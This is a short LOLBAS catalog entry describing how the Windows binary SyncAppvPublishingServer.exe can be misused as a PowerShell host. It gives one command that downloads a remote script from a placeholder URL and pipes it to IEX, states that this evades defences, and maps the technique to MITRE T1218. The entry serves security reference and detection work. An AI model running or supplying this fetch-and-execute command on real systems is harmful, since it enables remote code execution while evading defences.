Catalog LOLBAS

LOL · Binary

SyncAppvPublishingServer.exe

1 technique WindowsLOLBAS GPL-3.0

Execute

Execution Windows

Example command on how inject Powershell code into the process

Use Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"
Context
user
Native
Execute
MITRE
T1218